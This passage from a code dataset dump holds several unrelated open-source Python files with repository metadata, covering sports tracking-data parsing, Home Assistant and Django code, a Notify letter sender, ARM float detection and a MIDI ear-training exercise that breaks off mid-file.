x, y, _ = player_data["xyz"]
player = team.get_player_by_jersey_number(jersey_no)
if not player:
player = Player(
player_id=player_data["playerId"],
team=team,
jersey_no=int(jersey_no),
)
team.players.append(player)
players_data[player] = PlayerData(
coordinates=Point(float(x), float(y))
)
return Frame(
frame_id=frame_id,
timestamp=frame_timestamp,
ball_coordinates=Point3D(
float(ball_x), float(ball_y), float(ball_z)
),
ball_state=ball_state,
ball_owning_team=ball_owning_team,
players_data=players_data,
period=period,
other_data={},
)
@staticmethod
def __validate_inputs(inputs: Dict[str, Readable]):
if "xml_metadata" not in inputs:
raise ValueError("Please specify a value for 'xml_metadata'")
if "raw_data" not in inputs:
raise ValueError("Please specify a value for 'raw_data'")
def deserialize(self, inputs: SecondSpectrumInputs) -> TrackingDataset:
# Handles the XML metadata that contains the pitch dimensions and frame info
with performance_logging("Loading XML metadata", logger=logger):
match = objectify.fromstring(inputs.meta_data.read()).match
frame_rate = int(match.attrib["iFrameRateFps"])
pitch_size_height = float(match.attrib["fPitchYSizeMeters"])
pitch_size_width = float(match.attrib["fPitchXSizeMeters"])
periods = []
for period in match.iterchildren(tag="period"):
start_frame_id = int(period.attrib["iStartFrame"])
end_frame_id = int(period.attrib["iEndFrame"])
if start_frame_id != 0 or end_frame_id != 0:
# Frame IDs are unix timestamps (in milliseconds)
periods.append(
Period(
id=int(period.attrib["iId"]),
start_timestamp=start_frame_id,
end_timestamp=end_frame_id,
)
)
# Default team initialisation
home_team = Team(team_id="home", name="home", ground=Ground.HOME)
away_team = Team(team_id="away", name="away", ground=Ground.AWAY)
teams = [home_team, away_team]
if inputs.additional_meta_data:
with performance_logging("Loading JSON metadata", logger=logger):
try:
metadata = json.loads(inputs.additional_meta_data.read())
home_team_id = metadata["homeOptaId"]
away_team_id = metadata["awayOptaId"]
# Tries to parse (short) team names from the description string
try:
home_name = (
metadata["description"].split("-")[0].strip()
)
away_name = (
metadata["description"]
.split("-")[1]
.split(":")[0]
.strip()
)
except:
home_name, away_name = "home", "away"
teams[0].team_id = home_team_id
teams[0].name = home_name
teams[1].team_id = away_team_id
teams[1].name = away_name
for team, team_str in zip(
teams, ["homePlayers", "awayPlayers"]
):
for player_data in metadata[team_str]:
# We use the attributes field of Player to store the extra IDs provided by the
# metadata. We designate the player_id to be the 'optaId' field as this is what's
# used as 'player_id' in the raw frame data file
player_attributes = {
k: v
for k, v in player_data.items()
if k in ["ssiId", "optaUuid"]
}
player = Player(
player_id=player_data["optaId"],
name=player_data["name"],
starting=player_data["position"] != "SUB",
position=player_data["position"],
team=team,
jersey_no=int(player_data["number"]),
attributes=player_attributes,
)
team.players.append(player)
except: # TODO: More specific exception
logging.warning(
"Optional JSON Metadata is malformed. Continuing without"
)
# Handles the tracking frame data
with performance_logging("Loading data", logger=logger):
transformer = self.get_transformer(
length=pitch_size_width, width=pitch_size_height
)
def _iter():
n = 0
sample = 1 / self.sample_rate
for line_ in inputs.raw_data.readlines():
line_ = line_.strip().decode("ascii")
if not line_:
continue
# Each line is just json so we just parse it
frame_data = json.loads(line_)
if self.only_alive and not frame_data["live"]:
continue
if n % sample == 0:
yield frame_data
n += 1
frames = []
for n, frame_data in enumerate(_iter()):
period = periods[frame_data["period"] - 1]
frame = self._frame_from_framedata(teams, period, frame_data)
frame = transformer.transform_frame(frame)
frames.append(frame)
if not period.attacking_direction_set:
period.set_attacking_direction(
attacking_direction=attacking_direction_from_frame(
frame
)
)
if self.limit and n + 1 >= self.limit:
break
orientation = (
Orientation.FIXED_HOME_AWAY
if periods[0].attacking_direction == AttackingDirection.HOME_AWAY
else Orientation.FIXED_AWAY_HOME
)
metadata = Metadata(
teams=teams,
periods=periods,
pitch_dimensions=transformer.get_to_coordinate_system().pitch_dimensions,
score=None,
frame_rate=frame_rate,
orientation=orientation,
provider=Provider.SECONDSPECTRUM,
flags=DatasetFlag.BALL_OWNING_TEAM | DatasetFlag.BALL_STATE,
coordinate_system=transformer.get_to_coordinate_system(),
)
return TrackingDataset(
records=frames,
metadata=metadata,
)
| 8,335 | 369 | 46 |
124e4f0bae283d78713ff0d955d4def0bcc6fe58 | 4,091 | py | Python | home-assistant/custom_components/meteo-swiss/config_flow.py | twhite96/smart-home-setup | 25222e26b770275b43f227b45cf7e0f8ba749595 | [
"MIT"
] | 190 | 2020-05-03T21:13:00.000Z | 2022-03-31T23:16:30.000Z | home-assistant/custom_components/meteo-swiss/config_flow.py | heinoskov/smart-home-setup | 896d1f09bfd7059681f7b0b0f1935159dd12b512 | [
"MIT"
] | 11 | 2020-11-20T10:57:00.000Z | 2022-03-18T07:42:43.000Z | home-assistant/custom_components/meteo-swiss/config_flow.py | heinoskov/smart-home-setup | 896d1f09bfd7059681f7b0b0f1935159dd12b512 | [
"MIT"
] | 21 | 2020-10-02T14:44:06.000Z | 2022-02-27T10:50:08.000Z | """Config flow to configure the Meteo-Swiss integration."""
import logging
import re
import voluptuous as vol
from homeassistant.const import CONF_NAME, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant import config_entries
from homeassistant.core import callback
from .const import DOMAIN,CONF_POSTCODE,CONF_STATION,CONF_ENABLESENSORS
from hamsclient import meteoSwissClient
_LOGGER = logging.getLogger(__name__)
| 37.87963 | 135 | 0.644341 | """Config flow to configure the Meteo-Swiss integration."""
import logging
import re
import voluptuous as vol
from homeassistant.const import CONF_NAME, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant import config_entries
from homeassistant.core import callback
from .const import DOMAIN,CONF_POSTCODE,CONF_STATION,CONF_ENABLESENSORS
from hamsclient import meteoSwissClient
_LOGGER = logging.getLogger(__name__)
class MeteoSwissFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_POLL
def __init__(self):
"""Init FlowHandler."""
self._errors = {}
async def validate_config(self,config):
#check if the station id is found in stastion list
stationNameChk = await self.hass.async_add_executor_job(self._client.get_station_name,config[CONF_STATION])
if(stationNameChk is None):
self._errors[CONF_STATION] = "invalid_station_id"
_LOGGER.warning("%s not found in meteo swiss station list"%(config[CONF_STATION]))
#check if the station name is 3 character
if(not re.match(r"^\w{3}$",config[CONF_STATION])):
self._errors[CONF_STATION] = "invalid_station_name"
_LOGGER.warning("%s is not a valid station ID"%config[CONF_STATION])
if(not re.match(r"^\d{4}$",str(config[CONF_POSTCODE]))):
self._errors[CONF_POSTCODE] = "invalid_postcode"
_LOGGER.warning("%s is not a valid post code"%config[CONF_POSTCODE])
if(len(self._errors) == 0):
_LOGGER.info("Configuration for meteo swiss intergration validated")
return True
else:
_LOGGER.error("Configuration error for meteo suisse integration")
return False
async def async_step_user(self, user_input=None):
"""Handle a flow initiated by the user."""
self._errors = {}
lat = self.hass.config.latitude
lon = self.hass.config.longitude
self._client = await self.hass.async_add_executor_job(meteoSwissClient)
self._postCode = await self.hass.async_add_executor_job(self._client.getPostCode,lat,lon)
_LOGGER.debug("Get closest station for Lon : %s - Lat : %s",lon,lat)
self._station =await self.hass.async_add_executor_job(self._client.get_closest_station,lat,lon)
if(self._station is not None):
self._stationName = await self.hass.async_add_executor_job(self._client.get_station_name,self._station)
else:
self._stationName = None
_LOGGER.debug("Lon : %s - Lat : %s - PostCode %s Station %s Name: %s"%(lon,lat,self._postCode,self._station,self._stationName))
if user_input is not None:
_LOGGER.debug("User input is set")
if(await self.validate_config(user_input)):
return self.async_create_entry(title=user_input[CONF_NAME],data=user_input)
else:
return self._show_config_form(user_input)
else:
_LOGGER.debug("User input is set value is not set: ")
return self._show_config_form(user_input)
@callback
def _show_config_form(self,user_input):
"""Show the setup form to the user."""
if user_input is None:
user_input = {}
data_schema = {
vol.Required(CONF_NAME,default=self._stationName): str,
vol.Required(CONF_POSTCODE,default=self._postCode): int,
vol.Required(CONF_STATION,default=self._station): str,
vol.Required(CONF_ENABLESENSORS,default=True):bool
}
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(data_schema),
errors=self._errors
)
async def async_step_import(self, user_input):
"""Import a config entry."""
print(user_input)
return await self.async_step_user(user_input) | 1,149 | 2,492 | 31 |
a04c3f1060786937b154ac2f4bf2b64f1b4b9af4 | 1,969 | py | Python | chips/utils/block_diagram.py | dillonhuff/Chips-2.0 | c78df1597b5f6b024723c4804c6797e4b00387ca | [
"MIT"
] | 221 | 2015-02-23T20:03:29.000Z | 2021-12-23T13:08:24.000Z | chips/utils/block_diagram.py | dillonhuff/Chips-2.0 | c78df1597b5f6b024723c4804c6797e4b00387ca | [
"MIT"
] | 10 | 2015-10-08T14:30:31.000Z | 2019-04-28T04:42:44.000Z | chips/utils/block_diagram.py | dawsonjon/Chips-2.0 | 57a986b8df36248bb4736bd84e3e68046b8665af | [
"MIT"
] | 31 | 2015-10-31T00:51:03.000Z | 2021-09-06T15:40:58.000Z | from graphviz import Digraph
if __name__ == "__main__":
from chips.api.api import *
from chips.components.components import *
c = Chip("my_chip")
a = Input(c, "a")
b = Input(c, "b")
d = Input(c, "d")
e = Input(c, "e")
x, y = tee(c, add(c, add(c, a, b), add(c, d, e)))
discard(c, x)
discard(c, y)
b = BlockDiagram(c)
b.view()
| 29.38806 | 72 | 0.504317 | from graphviz import Digraph
class BlockDiagram():
def __init__(self, chip):
self.chip = chip
g = Digraph(self.chip.name, graph_attr={"rankdir": "LR"})
sources = {}
sinks = {}
for instance in self.chip.instances:
for port, wire in instance.inputs.iteritems():
sinks[str(id(wire))] = str(id(instance)) + ":" + port
for port, wire in instance.outputs.iteritems():
sources[str(id(wire))] = str(id(instance)) + ":" + port
inputs = "|".join(["<%s> %s" % (i, i)
for i in instance.inputs.keys()])
outputs = "|".join(["<%s> %s" % (i, i)
for i in instance.outputs.keys()])
label = "{{%s}|%s|{%s}}" % (
inputs,
instance.component_name,
outputs
)
g.node(str(id(instance)), label=label, shape="record")
for input_ in self.chip.inputs.values():
sources[str(id(input_))] = str(id(input_))
g.node(str(id(input_)), label=input_.name, shape="record")
for output_ in self.chip.outputs.values():
sinks[str(id(output_))] = str(id(output_))
g.node(str(id(output_)), label=output_.name, shape="record")
for wire, source in sources.iteritems():
sink = sinks[wire]
g.edge(source, sink)
self.g = g
def render(self, *args, **vargs):
return self.g.render(*args, **vargs)
def view(self, *args, **vargs):
return self.g.view(*args, **vargs)
if __name__ == "__main__":
from chips.api.api import *
from chips.components.components import *
c = Chip("my_chip")
a = Input(c, "a")
b = Input(c, "b")
d = Input(c, "d")
e = Input(c, "e")
x, y = tee(c, add(c, add(c, a, b), add(c, d, e)))
discard(c, x)
discard(c, y)
b = BlockDiagram(c)
b.view()
| 1,489 | 0 | 104 |
60a49c861da6feae6b72110e74da55a2ab442def | 852 | py | Python | src/the_tale/the_tale/game/companions/meta_relations.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 85 | 2017-11-21T12:22:02.000Z | 2022-03-27T23:07:17.000Z | src/the_tale/the_tale/game/companions/meta_relations.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 545 | 2017-11-04T14:15:04.000Z | 2022-03-27T14:19:27.000Z | src/the_tale/the_tale/game/companions/meta_relations.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 45 | 2017-11-11T12:36:30.000Z | 2022-02-25T06:10:44.000Z |
import smart_imports
smart_imports.all()
| 23.027027 | 63 | 0.656103 |
import smart_imports
smart_imports.all()
class Companion(meta_relations_objects.MetaType):
__slots__ = ('caption', )
TYPE = 6
TYPE_CAPTION = 'Спутник'
def __init__(self, caption, **kwargs):
super(Companion, self).__init__(**kwargs)
self.caption = caption
@property
def url(self):
return utils_urls.url('guide:companions:show', self.id)
@classmethod
def create_from_object(cls, companion):
return cls(id=companion.id, caption=companion.name)
@classmethod
def create_from_id(cls, id):
from . import storage
companion = storage.companions.get(id)
if companion is None:
return None
return cls.create_from_object(companion)
@classmethod
def create_from_ids(cls, ids):
return [cls.create_from_id(id) for id in ids]
| 485 | 307 | 23 |
a54fd76006cf7246fec8458be45888fd3ea922be | 920 | py | Python | notify.py | crablab/hackney-ipp | eb011365389202ec90f4d5c57fd864c0e59c2d78 | [
"MIT"
] | 2 | 2020-06-07T21:28:54.000Z | 2020-09-02T16:11:59.000Z | notify.py | crablab/hackney-ipp | eb011365389202ec90f4d5c57fd864c0e59c2d78 | [
"MIT"
] | null | null | null | notify.py | crablab/hackney-ipp | eb011365389202ec90f4d5c57fd864c0e59c2d78 | [
"MIT"
] | null | null | null | import cuid, sys, os
from dotenv import load_dotenv
from notifications_python_client.notifications import NotificationsAPIClient
# Load .env
load_dotenv()
# Set up a new Notify client
notifications_client = NotificationsAPIClient(os.getenv("NOTIFY_KEY"))
# Generate a unique reference
id_gen = cuid.CuidGenerator()
id = id_gen.cuid()
# Get the file redirected to stdin (as a binary file)
input = sys.stdin.buffer.read()
with open(id, "wb") as output:
output.write(input)
# Convert from PostScript to PDF (has the effect of stripping out PCL which Notify doesn't like)
os.system("ps2pdf {} {}.pdf".format(id, id))
# Try to send a letter
with open("{}.pdf".format(id), "rb") as file_to_send:
notification = notifications_client.send_precompiled_letter_notification(
reference=id, pdf_file=file_to_send
)
print(notification)
# Delete local files
os.remove(id)
os.remove("{}.pdf".format(id)) | 28.75 | 96 | 0.745652 | import cuid, sys, os
from dotenv import load_dotenv
from notifications_python_client.notifications import NotificationsAPIClient
# Load .env
load_dotenv()
# Set up a new Notify client
notifications_client = NotificationsAPIClient(os.getenv("NOTIFY_KEY"))
# Generate a unique reference
id_gen = cuid.CuidGenerator()
id = id_gen.cuid()
# Get the file redirected to stdin (as a binary file)
input = sys.stdin.buffer.read()
with open(id, "wb") as output:
output.write(input)
# Convert from PostScript to PDF (has the effect of stripping out PCL which Notify doesn't like)
os.system("ps2pdf {} {}.pdf".format(id, id))
# Try to send a letter
with open("{}.pdf".format(id), "rb") as file_to_send:
notification = notifications_client.send_precompiled_letter_notification(
reference=id, pdf_file=file_to_send
)
print(notification)
# Delete local files
os.remove(id)
os.remove("{}.pdf".format(id)) | 0 | 0 | 0 |
17f2d50a4262facd9daff3b661d550302005ac42 | 460 | py | Python | src/python_lib_for_me/list.py | silverag-corgi/python-lib-for-me | ed30c7b879396ca6af53c762d7c919b0ea44bea7 | [
"MIT"
] | null | null | null | src/python_lib_for_me/list.py | silverag-corgi/python-lib-for-me | ed30c7b879396ca6af53c762d7c919b0ea44bea7 | [
"MIT"
] | 1 | 2022-02-06T08:21:56.000Z | 2022-02-06T15:48:26.000Z | src/python_lib_for_me/list.py | silverag-corgi/python-lib-for-me | ed30c7b879396ca6af53c762d7c919b0ea44bea7 | [
"MIT"
] | null | null | null | '''
リストモジュール
'''
def split_list(elements: list, num_of_elements: int) -> list[list]:
'''
リスト分割
Args:
elements (list) : 要素リスト
num_of_elements (int) : 分割単位の要素数
Returns:
list[list]: 分割結果リスト
'''
items_list: list[list] = \
[elements[index : index + num_of_elements]
for index in range(0, len(elements), num_of_elements)]
return items_list
| 20 | 68 | 0.526087 | '''
リストモジュール
'''
def split_list(elements: list, num_of_elements: int) -> list[list]:
'''
リスト分割
Args:
elements (list) : 要素リスト
num_of_elements (int) : 分割単位の要素数
Returns:
list[list]: 分割結果リスト
'''
items_list: list[list] = \
[elements[index : index + num_of_elements]
for index in range(0, len(elements), num_of_elements)]
return items_list
| 0 | 0 | 0 |
22c8b2bbccd08a3508fd4d200508de71b852595e | 230 | py | Python | course3/lesson1/adder.py | dbrandenburg/python-oreilley-certification | 44af77d093100971e32d48b309f8d6e6d1b78364 | [
"Apache-2.0"
] | null | null | null | course3/lesson1/adder.py | dbrandenburg/python-oreilley-certification | 44af77d093100971e32d48b309f8d6e6d1b78364 | [
"Apache-2.0"
] | null | null | null | course3/lesson1/adder.py | dbrandenburg/python-oreilley-certification | 44af77d093100971e32d48b309f8d6e6d1b78364 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
def object_adder(a, b):
"""Adds two object together"""
if type(a) is not int or type(b) is not int:
raise TypeError("Object is not of type int")
return a + b
import sys
print(sys.argv)
| 20.909091 | 52 | 0.63913 | #!/usr/bin/env python3
def object_adder(a, b):
"""Adds two object together"""
if type(a) is not int or type(b) is not int:
raise TypeError("Object is not of type int")
return a + b
import sys
print(sys.argv)
| 0 | 0 | 0 |
a41459805297a3f06d4342530f581db1c689df22 | 6,044 | py | Python | yatube/posts/tests/test_urls.py | Ecmek/yatube_project | 24206ad81c73c184e0f24ca7242c3f8233278592 | [
"BSD-3-Clause"
] | 1 | 2021-08-17T07:30:35.000Z | 2021-08-17T07:30:35.000Z | yatube/posts/tests/test_urls.py | Ecmek/yatube_project | 24206ad81c73c184e0f24ca7242c3f8233278592 | [
"BSD-3-Clause"
] | null | null | null | yatube/posts/tests/test_urls.py | Ecmek/yatube_project | 24206ad81c73c184e0f24ca7242c3f8233278592 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.core.cache import cache
from posts.models import Post, Group
User = get_user_model()
index = '/'
group = 'group'
test_slug = 'test_slug'
fake_slug = 'fake_slug'
new_post = 'new'
post_edit = 'edit'
post_delete = 'delete'
follow_index = 'follow'
profile_follow = 'follow'
profile_unfollow = 'unfollow'
post_author = 'post_author'
another_user = 'another_user'
fake_author = 'fake_author'
login = 'auth/login'
| 38.253165 | 79 | 0.595963 | from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.core.cache import cache
from posts.models import Post, Group
User = get_user_model()
index = '/'
group = 'group'
test_slug = 'test_slug'
fake_slug = 'fake_slug'
new_post = 'new'
post_edit = 'edit'
post_delete = 'delete'
follow_index = 'follow'
profile_follow = 'follow'
profile_unfollow = 'unfollow'
post_author = 'post_author'
another_user = 'another_user'
fake_author = 'fake_author'
login = 'auth/login'
class StaticURLTests(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
# Создадим группу для проверки доступа к /group/test-slug/
cls.group = Group.objects.create(
title='Тестовое название группы',
slug='test_slug',
description='Тестовое описание группы',
)
# Создаем автора поста
cls.user = User.objects.create_user(
username='post_author'
)
# Создаем обычного пользователя
cls.user_2 = User.objects.create_user(
username='another_user'
)
# Создаем пост от имени post_author
cls.post = Post.objects.create(
text='рандомный текст',
author=StaticURLTests.user,
group=StaticURLTests.group,
)
def setUp(self):
# Устанавливаем данные для тестирования
# Создаём экземпляр клиента. Он неавторизован.
self.guest_client = Client()
# Авторизовыаем автора поста
self.post_author = Client()
self.post_author.force_login(self.user)
# Авторизовыаем обычного пользователя
self.authorized_client = Client()
self.authorized_client.force_login(self.user_2)
cache.clear()
def test_guest_client_urls_status_code(self):
# статус коды НЕ авторизованного пользователя
field_response_urls_code = {
f'{index}': 200,
f'/{group}/{test_slug}/': 200,
f'/{group}/{fake_slug}/': 404,
f'/{new_post}/': 302,
f'/{follow_index}/': 302,
f'/{post_author}/{profile_follow}/': 302,
f'/{post_author}/{profile_unfollow}/': 302,
f'/{post_author}/': 200,
f'/{post_author}/1/': 200,
f'/{post_author}/1/{post_edit}/': 302,
f'/{post_author}/1/{post_delete}/': 302,
f'/{fake_author}/': 404,
f'/{fake_author}/1/': 404,
}
for url, response_code in field_response_urls_code.items():
with self.subTest(url=url):
status_code = self.guest_client.get(url).status_code
self.assertEqual(status_code, response_code)
def test_authorized_client_urls_status_code(self):
# Статус коды авторизованного пользователя
field_response_urls_code = {
f'{index}': 200,
f'/{group}/{test_slug}/': 200,
f'/{group}/{fake_slug}/': 404,
f'/{follow_index}/': 200,
f'/{new_post}/': 200,
f'/{post_author}/{profile_follow}/': 302,
f'/{post_author}/{profile_unfollow}/': 302,
f'/{another_user}/{profile_follow}/': 302,
f'/{another_user}/{profile_unfollow}/': 302,
f'/{post_author}/': 200,
f'/{post_author}/1/': 200,
f'/{post_author}/1/{post_edit}/': 302,
f'/{post_author}/1/{post_delete}/': 302,
}
for url, response_code in field_response_urls_code.items():
with self.subTest(url=url):
status_code = self.authorized_client.get(url).status_code
self.assertEqual(status_code, response_code)
def test_guest_client_redirect(self):
# Проверка на редирект НЕ авторизованного пользователя
redirect_response = {
f'/{new_post}/': f'/{login}/?next=/{new_post}/',
f'/{post_author}/1/{post_edit}/': f'/{post_author}/1/',
f'/{follow_index}/': f'/{login}/?next=/{follow_index}/',
f'/{another_user}/{profile_follow}/':
f'/{login}/?next=/{another_user}/{profile_follow}/',
f'/{another_user}/{profile_unfollow}/':
f'/{login}/?next=/{another_user}/{profile_unfollow}/',
f'/{post_author}/1/{post_delete}/':
f'/{login}/?next=/{post_author}/1/{post_delete}/',
}
for url, redirect in redirect_response.items():
with self.subTest(url=url):
response = self.guest_client.get(url)
self.assertRedirects(response, redirect)
def test_authorized_client_redirect(self):
# проверка на редирект, не автора поста
response = self.authorized_client.get(f'/{post_author}/1/{post_edit}/')
self.assertRedirects(response, f'/{post_author}/1/')
def test_author_post_edit_status_code(self):
# Доступносить редактирования автору поста
response = self.post_author.get(
f'/{post_author}/1/{post_edit}/'
).status_code
self.assertEqual(response, 200)
def test_author_post_delete_status_code(self):
# Доступносить редактирования автору поста
response = self.post_author.get(
f'/{post_author}/1/{post_delete}/'
).status_code
self.assertEqual(response, 302)
def test_urls_use_correct_template(self):
# Юрл использует соответсвующий шаблон
templates_url_names = {
f'{index}': 'index.html',
f'/{group}/{test_slug}/': 'group.html',
f'/{follow_index}/': 'follow.html',
f'/{new_post}/': 'new_post.html',
f'/{post_author}/': 'profile.html',
f'/{post_author}/1/': 'post.html',
f'/{post_author}/1/{post_edit}/': 'new_post.html',
}
for adress, template in templates_url_names.items():
with self.subTest(adress=adress):
adress_url = self.post_author.get(adress)
self.assertTemplateUsed(adress_url, template)
| 5,785 | 269 | 23 |
0eb6b21802f5e9103e5fdcfae002c9610a22fe79 | 1,061 | py | Python | users/models.py | Yuri-Lima/SharePay | 18547053f7e86571366abf4ec4310bf1553395c5 | [
"MIT"
] | 1 | 2021-06-14T00:42:52.000Z | 2021-06-14T00:42:52.000Z | users/models.py | Yuri-Lima/SharePay | 18547053f7e86571366abf4ec4310bf1553395c5 | [
"MIT"
] | 72 | 2021-06-08T14:18:23.000Z | 2021-07-19T05:33:40.000Z | users/models.py | Yuri-Lima/SharePay | 18547053f7e86571366abf4ec4310bf1553395c5 | [
"MIT"
] | null | null | null | from typing import AbstractSet
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.conf import settings
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
| 32.151515 | 75 | 0.656927 | from typing import AbstractSet
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.conf import settings
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
class CustomUser(AbstractUser):
first_name = models.CharField(max_length=100, null= True, blank= True)
last_name = models.CharField(max_length=100, null= True, blank= True)
email = models.EmailField(max_length=255, unique=True)
class Meta:
verbose_name = _("User")
verbose_name_plural = _("Users")
def __str__(self):
if self.first_name and self.last_name:
fullname = self.first_name + ' ' + self.last_name
return fullname
else:
return self.username
def clean(self):
pass
# self.first_name = self.first_name.capitalize()
# self.last_name = self.last_name.capitalize()
def get_absolute_url(self):
return reverse("users:update", kwargs={"pk": self.pk})
| 380 | 411 | 24 |
5e2a3eca705b4a75c88e80e14b7a803235508b60 | 1,045 | py | Python | rpython/jit/backend/arm/detect.py | kantai/passe-pypy-taint-tracking | b60a3663f8fe89892dc182c8497aab97e2e75d69 | [
"MIT"
] | 2 | 2016-07-06T23:30:20.000Z | 2017-05-30T15:59:31.000Z | rpython/jit/backend/arm/detect.py | kantai/passe-pypy-taint-tracking | b60a3663f8fe89892dc182c8497aab97e2e75d69 | [
"MIT"
] | null | null | null | rpython/jit/backend/arm/detect.py | kantai/passe-pypy-taint-tracking | b60a3663f8fe89892dc182c8497aab97e2e75d69 | [
"MIT"
] | 2 | 2020-07-09T08:14:22.000Z | 2021-01-15T18:01:25.000Z | from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rtyper.tool import rffi_platform
from rpython.translator.platform import CompilationError
eci = ExternalCompilationInfo(
post_include_bits=["""
// we need to disable optimizations so the compiler does not remove this
// function when checking if the file compiles
static void __attribute__((optimize("O0"))) pypy__arm_has_vfp()
{
asm volatile("VMOV s0, s1");
}
"""])
def detect_float():
"""Check for hardware float support
we try to compile a function containing a VFP instruction, and if the
compiler accepts it we assume we are fine
"""
try:
rffi_platform.verify_eci(eci)
return True
except CompilationError:
return False
| 32.65625 | 73 | 0.735885 | from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rtyper.tool import rffi_platform
from rpython.translator.platform import CompilationError
eci = ExternalCompilationInfo(
post_include_bits=["""
// we need to disable optimizations so the compiler does not remove this
// function when checking if the file compiles
static void __attribute__((optimize("O0"))) pypy__arm_has_vfp()
{
asm volatile("VMOV s0, s1");
}
"""])
def detect_hardfloat():
# http://gcc.gnu.org/ml/gcc-patches/2010-10/msg02419.html
if rffi_platform.getdefined('__ARM_PCS_VFP', ''):
return rffi_platform.getconstantinteger('__ARM_PCS_VFP', '')
return False
def detect_float():
"""Check for hardware float support
we try to compile a function containing a VFP instruction, and if the
compiler accepts it we assume we are fine
"""
try:
rffi_platform.verify_eci(eci)
return True
except CompilationError:
return False
| 203 | 0 | 23 |
1f67795097e35d599aea4f61805cac7c3ba14838 | 322 | py | Python | helios/nodes/ropsten.py | hyperevo/py-helios-node | ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8 | [
"MIT"
] | null | null | null | helios/nodes/ropsten.py | hyperevo/py-helios-node | ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8 | [
"MIT"
] | null | null | null | helios/nodes/ropsten.py | hyperevo/py-helios-node | ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8 | [
"MIT"
] | null | null | null | from helios.chains.ropsten import (
RopstenFullChain,
RopstenLightDispatchChain,
)
from helios.nodes.light import LightNode
from helios.nodes.full import FullNode
| 21.466667 | 43 | 0.804348 | from helios.chains.ropsten import (
RopstenFullChain,
RopstenLightDispatchChain,
)
from helios.nodes.light import LightNode
from helios.nodes.full import FullNode
class RopstenFullNode(FullNode):
chain_class = RopstenFullChain
class RopstenLightNode(LightNode):
chain_class = RopstenLightDispatchChain
| 0 | 103 | 46 |
b776aa6a895912c21971a838bd9b4ff69860dcbe | 562 | py | Python | icedata/datasets/coco/tests/test_parser.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | null | null | null | icedata/datasets/coco/tests/test_parser.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | null | null | null | icedata/datasets/coco/tests/test_parser.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | null | null | null | import icedata
from icevision.all import *
| 29.578947 | 83 | 0.647687 | import icedata
from icevision.all import *
def test_parser(data_dir):
class_map = icedata.coco.class_map()
parser = icedata.coco.parser(
annotations_file=data_dir / "annotations.json", img_dir=data_dir / "images"
)
records = parser.parse(data_splitter=SingleSplitSplitter())[0]
assert len(records) == 5
r = records[2]
assert (r["height"], r["width"]) == (427, 640)
assert r["imageid"] == 2
assert r["bboxes"][0].xywh == (0.0, 73.89, 416.44, 305.13)
assert r["filepath"] == data_dir / "images/000000128372.jpg"
| 495 | 0 | 23 |
d5d782f07d49524242d5d7d49587dfa75702b348 | 2,892 | py | Python | source/07/mc-7-5-tp-cde-hd.py | schef/schef.github.io | ac6fc70e5077deeeb8233ede89e0895fdc2a0d05 | [
"MIT"
] | null | null | null | source/07/mc-7-5-tp-cde-hd.py | schef/schef.github.io | ac6fc70e5077deeeb8233ede89e0895fdc2a0d05 | [
"MIT"
] | null | null | null | source/07/mc-7-5-tp-cde-hd.py | schef/schef.github.io | ac6fc70e5077deeeb8233ede89e0895fdc2a0d05 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Written by Stjepan Horvat
# ( zvanstefan@gmail.com )
# by the exercises from David Lucal Burge - Perfect Pitch Ear Traning Supercourse
# Thanks to Wojciech M. Zabolotny ( wzab@ise.pw.edu.pl ) for snd-virmidi example
# ( wzab@ise.pw.edu.pl )
import random
import time
import sys
import re
fname="/dev/snd/midiC2D0"
#fname=sys.argv[1]
fin=open(fname,"rb")
fout=open(fname,"wb")
#keymin=int(sys.argv[2])
#keymax=int(sys.argv[3])
#keymin=int(60)
#keymax=int(72)
#c major scale
print ("Exercise 7-4:")
print ("C D and E. Harmonic and melodic pitch indentification. Melodic doubles.")
#from c to c'' white tones
#c major scale
#notes = [ 36, 38, 40, 41, 43, 45, 47, 48, 50, 52, 53, 55, 57, 59, 60, 62, 64, 65, 67, 69, 71, 72, 74, 76, 77, 79, 81, 83, 84, 86, 88, 89, 91, 93, 95, 96 ]
notes = [ 36, 38, 40, 48, 50, 52, 60, 62, 64, 72, 74, 76, 84, 86, 88, 96 ]
noteC = [ 36, 48, 60, 72, 84, 96 ]
usage = "Usage: 1-repeat, <note> <note> \"c d\", ?-usage."
round = 1
a = re.compile("^[c-e] [c-e]$")
try:
print(usage)
while True:
noteOne = random.choice(notes)
while True:
noteTwo = random.choice(notes)
if nameNote(noteOne) != nameNote(noteTwo) and noteOne < noteTwo:
break
match = False
while not match:
done = False
playTwoNotes(noteOne, noteTwo)
while not done:
n = input("? ")
if n == "1":
playTwoNotes(noteOne, noteTwo)
if n == "?":
print(usage)
#TODO:bug da prima sve umjesto samo imena nota
elif a.match(n):
splitNote = n.split()
